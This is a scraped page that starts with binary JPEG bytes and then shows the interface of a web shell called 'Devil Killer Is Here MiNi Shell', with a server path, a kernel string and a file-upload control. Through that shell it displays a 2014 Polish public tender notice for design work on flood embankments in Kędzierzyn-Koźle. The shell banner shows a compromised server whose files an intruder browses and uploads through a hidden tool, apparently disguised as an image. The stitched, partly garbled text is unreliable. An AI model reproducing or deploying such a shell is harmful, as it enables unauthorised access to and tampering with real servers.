JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141105/365912-N-2014.html

<p class="kh_header"><b>Opole: Rozbudowa prawostronnego wału przeciwpowodziowego rzeki Odry w km 91+000-95+000  oraz budowa nowego wału wzdłuż prawego brzegu rzeki Kłodnicy na terenie m. Kędzierzyna-Koźla</b><br>
<b>Numer ogłoszenia: 365912 - 2014; data zamieszczenia: 05.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zarząd  Melioracji i Urządzeń Wodnych , ul. Katowicka 55, 45-061 Opole, woj. opolskie, tel. (077) 442-57-42, faks (077) 442-57-42, 4425726.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzmiuw.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa prawostronnego wału przeciwpowodziowego rzeki Odry w km 91+000-95+000  oraz budowa nowego wału wzdłuż prawego brzegu rzeki Kłodnicy na terenie m. Kędzierzyna-Koźla.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej  dla   rozbudowy istniejącego wału Koźle  o dł. L=1,8 km oraz budowy nowego odcinka wału, stanowiącego wydłużenie  istniejącego , o którym mowa wcześniej, do torów kolejowych (relacja Kędzierzyn Koźle  - Opole) w celu uzyskania przez  Zamawiającego  pozwolenia na realizację inwestycji w zakresie budowli przeciwpowodziowej, o którym mowa w ustawie z dn. 8 lipca 2010r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. 2010 Nr 143, poz. 963 z późn zm.) Wykonawca dokumentacji projektowej wykona obliczenia hydrauliczne z uwzględnieniem prowadzonych i zakończonych  inwestycji przeciwpowodziowych  w hydrowęźle Kędzierzyna Koźla oraz terenów położonych powyżej wzdłuż biegu rzeki Odry. W  zakresie rozbudowy istniejącego wału należy uwzględnić m.in.  podwyższenie do odpowiedniej rzędnej jeżeli zajdzie taka konieczność , zaprojektowanie drogi serwisowej  wzdłuż budowli oraz  wykonanie innych prac   wynikających ze sztuki budowlanej.   Na odcinku wału nowoprojektowanego  stanowiącego przedłużenie wału Koźle (ul. Dunikowskiego - ul. Wyspiańskiego) do torów kolejowych,  Wykonawca dokumentacji projektowej zaprojektuje  ścieżkę rowerową na koronie wału oraz drogę serwisową wzdłuż wału. Projektant uzyska dodatkowo pozytywną opinię Prezydenta  Miasta Kędzierzyna Koźla dla zaprojektowanej ścieżki rowerowej. Załączony do siwz - załącznik mapowy, przedstawia fragment mapy  z Koncepcji zabezpieczenia przed powodzią doliny rz. Odry  km 66-114  powiat  Kędzierzyn Koźle (gminy: Bierawa, Cisek,   K-Koźle i Reńska Wieś) opracowanej przez firmę HART s.c. w 2000r. (trasa wrysowanego wału nie obliguje  wykonawcy do zaprojektowania  budowli wg tej koncepcji). Długość istniejącego wału Koźle przewidzianego do rozbudowy  wynosi L= 1,8 km.Długość wału nowoprojektowanego, stanowiącego wydłużenie wału Koźle będzie wynikała z koncepcji rozwiązań projektowych, sporządzonej w trzech wariantach  przez Wykonawcę dokumentacji projektowej. Wg koncepcji firmy HART s.c. , z której fragment mapy załączono do przetargu, długość brakującego odcinka wału wynosi 1,9 km. Trasa wału wrysowanego na załączonej do przetargu mapy  nie obliguje  Wykonawcy do zaprojektowania  budowli wg tej koncepcji.Dokumentację   projektową  należy opracować zgodnie z obowiązującymi w dniu przekazania dokumentacji przepisami w tym techniczno - budowlanymi i normami. Wykonawca dokumentacji projektowej zobowiązany będzie do prowadzenia bieżących uzgodnień  w zakresie rozwiązań projektowych  z Zamawiającym. Szczegółowy  zakres dokumentacji  projektowej: Koncepcja rozwiązań projektowych   -  część graficzna i opisowa zakładająca przynajmniej trzy propozycje  rozwiązań. Koncepcja winna zawierać  porównanie i wnioski końcowe - ma umożliwiać wskazanie wariantu najkorzystniejszego ze względu na kryteria ekonomiczne, społeczne i środowiskowe. Należy przeprowadzić wielokryterialną analizę porównawczą wariantów.  Na potrzeby opracowania koncepcji Wykonawca wykona pomiary geodezyjne oraz badania geologiczne dla każdego wariantu i udokumentuje je w koncepcji.  Opracowując wariantową koncepcję projektant wskaże Zamawiającemu najbardziej optymalny, możliwy do realizacji projekt wału przeciwpowodziowego - 3 egz. Mapa do celów projektowych  - w ilości niezbędnej do opracowania dokumentacji projektowej i uzyskania pozwolenia na realizację inwestycji, wykonana zgodnie z Rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz.U. 1995 nr 25 poz. 133). Wykonawca zobowiązany jest do wykonania aktualnej mapy sytuacyjno-wysokościowej z geodezyjną inwentaryzacją urządzeń nadziemnych i podziemnych zgodnie ze standardami przyjętymi w geodezji oraz uzyskanie przyjęcia mapy do państwowego zasobu geodezyjno - kartograficznego. Mapa sytuac. - wysok. powinna posiadać pieczęcie ośrodka dokumentacji geodezyjnej potwierdzające, że mapa nadaje się do celów projektowych. Mapa do celów projektowych powinna zawierać aktualny stan prawny obowiązującej mapy ewidencyjnej i wszystkie elementy mapy zasadniczej. Karta informacyjna przedsięwzięcia  wraz z wnioskiem o wydanie decyzji o środowiskowych uwarunkowaniach przedsięwzięcia oraz jej uzyskanie  - 3 egz. Wykonawca zobowiązany jest do złożenia wniosku o wydanie powyższej decyzji  wraz z niezbędnymi dokumentami w tym raportu oddziaływania na środowisko w przypadku nałożenia takiego obowiązku przez właściwy organ KIP winna zawierać m.in. ocenę wpływu inwestycji na biologiczne, hydromorfologiczne oraz fizykochemiczne elementy stanu wód właściwe do osiągnięcia zidentyfikowanych celów środowiskowych jednolitych części wód stosownie do Ramowej Dyrektywy Wodnej KIP opracować zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko i innymi przepisami oraz wymogami organu wydającego decyzję.Operat wodnoprawny - 3 egz. opracować zgodnie z wymogami ustawy z dn. 18 lipca 2001r. Prawo Wodne (Dz. U. z 2012 poz. 145 z późn. zm.). Wykonawca zobowiązany jest do złożenia wniosku o wydanie pozwolenia wodnoprawnego oraz jego  uzyskania. Wykonawca wykona obliczenia hydrauliczne.Inwentaryzacja drzew i krzewów (inwentaryzacja dendrologiczna)- 4 egz.Wykonawca zobowiązany jest do wykonania inwentaryzacji gatunkowej drzew i krzewów (wg gatunków). Inwentaryzacja winna posiadać m.in. dokładne i czytelne zaznaczenie (kolorem i numerem ) drzew do usunięcia; krzewy do usunięcia - z podaniem wielkości powierzchni,  z której zostaną usunięte Inwentaryzacja winna być  szczegółowa  aby móc ją wykorzystać na potrzeby szacowania wartości nieruchomości w związku z koniecznością wypłaty odszkodowań. Dokumentacja geologiczna  obejmująca badania podłoża pod  wałem  jak również terenu stanowiącego potencjalną rezerwę  gruntu przewidzianego do budowy wału  - 4 egz. Dokumentacja geologiczna winna być opracowana w zakresie odpowiadającym dla danej klasy budowli. Zgodnie z obowiązującym Rozporządzeniem  Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie ustalania geotechnicznych warunków posadowienia obiektów budowlanych (Dz.U. 2012 nr 0 poz. 463) oraz Rozporządzenie Ministra Środowiska z dnia 23 grudnia 2011 r. w sprawie dokumentacji hydrogeologicznej i dokumentacji geologiczno-inżynierskiej (Dz.U. 2011 nr 291 poz. 1714).Projekt budowlany - 6 egz.Wykonawca zobowiązany jest do opracowania projektu budowlanego (część opisowa i graficzna) zgodnie z wymogami art. 34 ustawy z dn. 7 lipca 1994r. Prawo Budowlane (Dz. U. 2013, poz. 1409 z późn. zm.) ,  Rozporządzeniem Ministra Środowiska z dnia 20 kwietnia 2007 r. w sprawie warunków technicznych, jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie (Dz. U. 2007 nr 86 poz. 579 z późn. zm.), Rozporządzeniem Ministra Transportu, Budownictwa, i Gospodarki Morskiej   z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r. poz. 462 z późn. zm.), Rozporządzeniem Ministra Infrastruktury z dn. 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2004 nr 202 poz. 2072). Projekt budowlany będzie zawierał wszystkie branże i elementy niezbędne do realizacji inwestycji:z uwzględnieniem rozwiązań technicznych wszelkich kolizji z uzbrojeniem technicznym podziemnym i naziemnym terenu (np. kanalizacja, linie energetyczne wraz z przebudową słupów, ew. teletechniczne i inne zinwentaryzowane w trakcie projektowania) z uwzględnieniem niezbędnej przebudowy lub rozbiórki istniejącej infrastruktury terenowej z uwzględnieniem robót towarzyszących (np. budowy dróg technologicznych, przejazdów, zjazdów itp.) ze wskazaniem teren stanowiącego potencjalne miejsce poboru gruntu wraz z opiniami, uzgodnieniami, pozwoleniami i innymi dokumentami wymaganymi przepisami szczególnymi, w tym ZUD.Wykonawca dokumentacji projektowej na etapie  opracowywania projektu budowlanego  winien wyraźnie oznaczyć w terenie  (dowolny sposób)  trasę budowli przeciwpowodziowej (oś wału), celem umożliwienia Zamawiającemu  rozpoznania dokładnej  lokalizacji i przebiegu projektowanej budowli przeciwpowodziowej. Projekty podziału nieruchomości , o których mowa w art. 6 ust. 1 pkt. 4 ustawie z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. 2010 Nr 143, poz. 963 z późn. zm.)-  w ilości niezbędnej do uzyskania pozwolenia na realizację inwestycji , jednak nie mniej niż  6 kpl.Zamawiający przed przystąpieniem do wyceny usługi  zaleca wstępne przeanalizowanie rozwiązań projektowych oraz zapoznanie się z terenem albowiem na etapie projektowania zmiana ilości działek przewidzianych pod inwestycję nie będzie miała wpływu na zmianę wynagrodzenia Wykonawcy.Wniosek o wydanie decyzji pozwolenie na realizację inwestycji wraz ze wszystkimi materiałami niezbędnymi w celu uzyskania decyzji pozwolenie na realizację inwestycji w świetle ustawy z dn. 8 lipca 2010r.  o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. z 2010 r. Nr 143, poz. 963 z późn. zm.). Wykonawca dokumentacji projektowej zobowiązany będzie do dokonywania wszelkich uzupełnień , usunięć braków  we wniosku oraz  w  załącznikach do niego na etapie  zabiegania Zamawiającego o uzyskanie pozwolenia na realizację inwestycji przeciwpowodziowej.Projekt wykonawczy  - 6 egz.Wykonawca zobowiązany jest do opracowania projektów wykonawczych (część opisowa i graficzna) zgodnie z obowiązującymi przepisami prawnymi, normami technicznymi, ustaleniami z Zamawiającym.  Projekt wykonawczy winien uzupełniać i uszczegóławiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego i realizacji robót.Przedmiary robót - 6 egz. opracowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dn. 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2004 r. Nr 202, Poz.2072). Szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót - 6 egz.opracowana zgodnie z Rozporządzeniem Ministra Infrastruktury z dn. 2 września 2004r.w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2004 r. Nr 202, Poz.2072). Kosztorys inwestorski - 3 egz. opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. 2004 r. Nr 130, poz. 1389). Uzyskanie  zgód  wejścia na grunt od właścicieli działek  aby inwestor mógł złożyć oświadczenie o dysponowaniu gruntem na cele budowlane ( dla nieruchomości planowanych do zajęcia tymczasowego tj. w okresie prowadzonych robót budowlanych)  oraz uzgodnienie z właścicielami działek miejsca przewidzianego na  składowanie lub rozplantowanie urobku bądź  składanie innych materiałów  w okresie prowadzenia robót budowlanych. Wykonawca dokona niezbędnych opinii, sprawdzeń i uzgodnień z właściwymi jednostkami. W przypadku zmian w przepisach, pociągających za sobą potrzebę uzyskania nowych decyzji, uzgodnień wykonawca ma obowiązek ich pozyskania w ramach ceny ofertowej. Wykonawca zobowiązuje się dostarczyć dokumentację w wersji papierowej w ilości jak wyżej oraz w wersji cyfrowej na nośniku elektronicznym - płyta CD lub DVD. Do obowiązków Wykonawcy będzie należało:brać udział w radach technicznych związanych z przedmiotowym opracowaniem (na wniosek  Zamawiającego) aktualizować na żądanie Zamawiającego kosztorys inwestorski organizować oraz brać czynny udział w okazaniach rozwiązań projektowych z udziałem społeczeństwa na polecenie Zamawiającego Wykonawca dokumentacji projektowej zobowiązany będzie do odbycia maksymalnie  3 wspólnych wizji terenowych  w terminie wyznaczonym przez Zamawiającego. oczekuje się aby  Wykonawca  co najmniej 1 miesiąc  przed zdaniem Zamawiającemu projektu budowlanego dokonał  wizji lokalnej w terenie celem potwierdzenia stanu faktycznego w terenie ze stanem przedstawionym w projekcie budowlanym. Wykonawca dokumentacji projektowej na etapie  opracowywania projektu budowlanego  winien wyraźnie oznaczyć w terenie  (dowolny sposób)  trasę budowli przeciwpowodziowej (oś wału), celem umożliwienia Zamawiającemu  rozpoznania dokładnej  lokalizacji i przebiegu projektowanej budowli przeciwpowodziowej. UWAGA:Przed złożeniem oferty na wykonanie  usługi tj. dokumentacji projektowej Wykonawca jest zobowiązany dokonać wizji terenowej  na przedmiotowym obiekcie.Termin opracowania:30 październik  2015r. Zamawiający zastrzega możliwość fakturowania poszczególnych  elementów w następującej kolejności:1. Koncepcja rozwiązań projektowych zaakceptowana przez Zamawiającego2. Karta informacyjna przedsięwzięcia/raport oddziaływania na środowisko  wraz z wnioskiem  o wydanie decyzji  o środowiskowych  uwarunkowaniach  zgody na realizację  przedsięwzięcia , mapa ewidencyjna , wypisy  z rejestru gruntów3. Uzyskanie decyzji o środowiskowych uwarunkowaniach  zgody na realizację przedsięwzięcia, operat wodnoprawny  wraz z wnioskiem  o wydanie  decyzji pozwolenie wodnoprawne4. Uzyskanie pozwolenia wodnoprawnego, projekt budowlany, informacja BIOZ, projekt zagospodarowania terenu , badania  geologiczne5. Projekt podziału nieruchomości  w formie operatu  geodezyjnego  podziału  oraz wniosek  o wydanie decyzji pozwolenie na realizację inwestycji  w świetle ustawy  z dn. 8 lipca  2010r.  o szczególnych zasadach  przygotowania do realizacji  inwestycji  w zakresie budowli przeciwpowodziowych (Dz. U. z 2010r.  Nr 143, poz. 963 z późn. zm.), wniosek o wydanie decyzji o pozwoleniu na realizację inwestycji przeciwpowodziowej6. Projekt wykonawczy, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót, kosztorys inwestorski.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium.
Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:

8 000 zł

2.	Forma wadium.
1)	Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 nr 42, poz. 275 z późn. zm.).

2)	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być bezwarunkowa oraz winna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
c)	kwotę gwarancji,
d)	termin ważności gwarancji
e)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego
f)	zawierające oświadczenie, iż:

- Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.

lub, że:

-  Wykonawca, którego ofertę wybrano:
odmówił podpisania umowy na warunkach określonych we ofercie, lub
nie wniósł zabezpieczenia należytego wykonania umowy, lub
zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;

3)	Postanowienia pkt 12.2.2) stosuje się odpowiednio do poręczeń, określonych powyżej w pkt. 12.2.1)b) i 12.2.1)e).

3.	Miejsce i sposób wniesienia wadium.
1) Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:

Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Opolu
Bank Polskiej Spółdzielczości 
68 1930 1028 2010 0002 7704 0002

Do oferty należy dołączyć kopię polecenia przelewu, potwierdzoną za zgodność z oryginałem

2)	Wadium wnoszone w dopuszczonych przez Zamawiającego formach należy złożyć w siedzibie Wojewódzkiego Zarządu Melioracji i Urządzeń Wodnych w Opolu, ul. Katowicka 55 pok. nr 15 - oryginał, ponadto Wykonawca dołączy kopię wadium do oferty i połączy ją z ofertą w sposób trwały.

4.	Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 

W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym, do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.

5.	Zwrot wadium.
Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 u.p.z.p.  

6.	Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 u.p.z.p., nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.

Ponadto Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie będzie oceniany</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony, jeżeli Wykonawca wykaże: 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będą ich łączne kwalifikacje i doświadczenie):
wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 usługi, która związana była z wykonaniem dokumentacji projektowej, dla której uzyskano prawomocne pozwolenie na budowę z klauzulą ostateczności lub prawomocną decyzję o pozwoleniu na realizację inwestycji przeciwpowodziowej z klauzulą ostateczności (uzyskanej zgodnie z Ustawą z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych; Dz. U. 2010 nr 143 poz. 963),  natomiast zakres usługi obejmował sporządzenie dokumentacji projektowej: 
budowy wałów przeciwpowodziowych co najmniej III klasy ważności zgodnie z Rozporządzeniem Ministra Środowiska z dn. 20 kwietnia 2007r. w sprawie warunków technicznych jakim  powinny odpowiadać  budowle hydrotechniczne  i ich usytuowanie (Dz. U. 2007 nr 86 poz. 579 z późn. zm.) o długości nie mniejszej niż 1 km.
Jako dokumentację projektową rozumie się wyłącznie projekt budowlany lub projekt budowalno-wykonawczy wykonany zgodnie z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 25 kwietnia 2012 r. (Dz. U. z 2012 r. poz. 462) oraz Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2004 nr 202 poz. 2072).
Dokumentacja projektowa musi być wykonana zgodnie z polskim prawem, natomiast w przypadku wykonania dokumentacji projektowej poza granicami kraju - zgodnie z równoważnymi do polskich przepisami prawa obcego z zastrzeżeniami zawartymi w opisie spełnienia niniejszego warunku udziału w postępowaniu, przedstawionego powyżej.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW oraz dokumenty potwierdzające, że usługi zostały wykonane należycie.
Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców usługi, zostały wykonane należycie zawierały, co najmniej:
a.	wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował usługi, których dokumenty dotyczą,
